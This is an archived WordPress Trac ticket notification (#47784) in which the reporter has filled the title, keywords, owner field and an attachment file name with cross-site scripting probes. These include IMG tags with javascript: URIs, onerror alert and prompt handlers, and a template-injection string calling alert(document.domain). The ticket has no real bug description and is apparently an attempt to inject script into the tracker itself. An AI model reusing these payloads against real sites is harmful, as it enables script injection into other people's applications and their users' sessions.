[wp-trac] [WordPress Trac] #47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert(‘XSS’)> <img src=xss onerror=alert(1)>

WordPress Trac noreply at wordpress.org
Fri Jul 26 17:59:41 UTC 2019


#47784: <IMG SRC=jAVasCrIPt:alert(‘XSS’)> <IMG SRC=”javascript:alert(‘XSS’);”> <IMG
SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(‘XSS’)>
<img src=xss onerror=alert(1)>
-------------------------------------+-------------------------------------
 Reporter:  harry008                 |       Owner:
                                     |  {{constructor.constructor('alert(document.domain)')()}}
     Type:  enhancement              |      Status:  assigned
 Priority:  normal                   |   Milestone:  Awaiting Review
Component:  General                  |     Version:  5.2.2
 Severity:  normal                   |  Resolution:
 Keywords:  has-patch<IMG            |     Focuses:
  SRC=jAVasCrIPt:alert(‘XSS’)> <IMG  |
  SRC=”javascript:alert(‘XSS’);”>    |
  <IMG                               |
  SRC=javascript:alert("XSS")>       |
  <IMG SRC=javascript:alert(‘XSS’)>  |
  <img src=xss onerror=alert(1)>     |
-------------------------------------+-------------------------------------
Changes (by harry008):

 * Attachment "“> <img src = x onerror = prompt (document.domain)>.jpg"
 added.

 {{constructor.constructor('alert(document.domain)')()}}

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47784>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

